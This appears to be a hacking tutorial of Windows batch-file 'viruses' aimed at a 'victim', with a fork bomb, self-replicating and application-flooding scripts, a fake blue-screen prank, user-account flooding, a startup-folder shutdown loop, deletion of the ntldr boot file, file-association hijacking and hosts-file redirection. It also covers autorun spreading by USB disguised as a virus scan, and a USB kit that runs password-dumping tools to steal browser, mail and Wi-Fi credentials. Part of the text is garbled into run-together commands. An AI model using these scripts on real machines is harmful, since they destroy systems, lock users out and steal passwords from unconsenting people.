$ :(){ :|:& };:
@echo off
//label
start winword //MS word
start mspaint //paint
start notepad
start write //wordpad
start cmd //cmd prompt
start explorer
start control //panel
start calc //calculator
goto x //infinite loop
(DANGER THIS ONE IS DANGEROUS AS HELLLLL)
@echo off
:A
SET /A x=%RANDOM%%%1999999999%
type damage.bat >> %x%.bat
start %x%.bat
goto:A
@echo offcd /clscolor 17echo A problem has been detected and Windows has been shut down to prevent damageecho to your computer.echo.echo The problem seems to be caused by the following file: SPCMDCON.SYSecho.echo PAGE_FAULT_IN_NONPAGED_AREAecho.echo If this is the first time you've seen this stop error screen,echo restart your computer. If this screen appears again, followecho these steps:echo.echo Check to make sure any new hardware or software is properly installed.echo If this is a new installation, ask your hardware or software manufacturerecho for any Windows updates you might need.echo.echo If problems continue, disable or remove any newly installed hardwareecho or software. Disable BIOS memory options such as caching or shadowing.echo If you need to use Safe Mode to remove or disable components, restartecho your computer, press F8 to select Advanced Startup Options, and thenecho select Safe Mode.echo.echo Technical information:echo.echo *** STOP: 0x00000050 (0xFD3094C2,0x00000001,0xFBFE7617,0x00000000)echo.echo.echo *** SPCMDCON.SYS - Address FBFE7617 base at FBFE5000, DateStamp 3d6dd67cpause >nulclsecho Downloading viruses . . .ping localhost -n 5 >nuldir /spause >nul
1. Application Bomber
@echo off // It instructs to hide the commands when batch files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop
This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and ofcourse affecting performance.
2. Folder flooder
@echo off
:x
md %random% // makes directory/folder.
goto x
Here %random% is a variable that would generate a positive no. randomly. So this code would make start creating folders whose name can be any random number.
3.User account flooder
@echo off
:x
net user %random% /add //create user account
goto x
This code would start creating windows user accounts whose names could be any random numbers.
3.Shutdown Virus
copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00 //this will shutdown the computer in 0 seconds
Note : Files in Start up folder gets started automatically when windows starts . You should first two lines of code in every virus code so that it would copy itself in startup folder. Start up folder path in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Everytime the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder.
4. Deleting boot files
Goto C drive in Win XP , Tools->Folder Option->View
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply
Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows.
Lets make a batch file to
delete this file from victim's computer and the windows will not start then.
attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del ntldr //delete ntldr file
After running this batch file , system will not reboot and a normal victim would definitely install the windows again.
5. Fork Bomb
%0|%0 //Its percentage zero pipe percentage zero
This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows .
6. Extension Changer
@echo off
assoc .txt=anything // this command associates extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything
Every extension is associated with a filetype like extension ‘exe’ is is associated with filetype ‘exefile’. To see them, just enter command ‘assoc’ in command prompt.
Above code changes the association of some extensions to filetype ‘anything’ (means u can write anything) which obviously doesn’t exist. So all exe (paint,games,command prompt and many more),jpeg,png,mpeg files wudn’t open properly.
7. DNS Poisoning
There is a file called ‘hosts’ located at c:\windows\system32\drivers\etc. We can place a website and an IP in front of it. By doing this, we want our web browser to take us to host located at that IP when that website name would be entered. I mean request to resolve IP of website is not sent to Domain Name Server(DNS) if the name of website in hosts file.
@echo off
echo xxx.xxx.xxx.xxx www.anything.com > C:\windows\system32\drivers\etc\hosts //this command prints or add xxx.xxx.xxx.xxx. www.anything.com in hosts file.
Replace xxx.xxx.xxx.xxx and www.anything.com with IP address and website of your choice. You can take/redirect victim to any host located at specific IP when he wud try to log on to specific website or u can simply block any website by entering its name and any invalid IP address.
Viruses we just coded
Spreading batch viruses through pen drive -:
Step 1.
Open notepad and write
[autorun]
open=anything.bat
Icon=anything.ico
Save file as ‘autorun.inf’
Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .
When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.
- open notepad/wordpad
type:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan4
save this as AUTORUN.inf - open a new notepad/wordpad document
type:
start mspass.exe /stext mspass.txt4
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start PasswordFox.exe /stext passwordfox.txt
start OperaPassView.exe /stext OperaPassView.txt
start ChromePass.exe /stext ChromePass.txt
start Dialupass.exe /stext Dialupass.txt
start netpass.exe /stext netpass.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start VNCPassView.exe /stext VNCPassView.txt
start OpenedFilesView.exe /stext OpenedFilesView.txt
start ProduKey.exe /stext ProduKey.txt
start USBDeview.exe /stext USBDeview.txt
save this as LAUNCH.bat - copy the autorun and launch file to your USB
- go to http://www.nirsoft.net/ and download the programs named in step 2
- extract the files you downloaded to your desktop and copy all the .exe files to your USB
- remove and re-insert your USB
- click on the option perform a virus scan
(this is an exemple, if you want it to say something else go to the autorun file and change it ;) ) - go to my computer---> USB DRIVE and open it
you will now see some text files, if you open them you will see usernames and passwords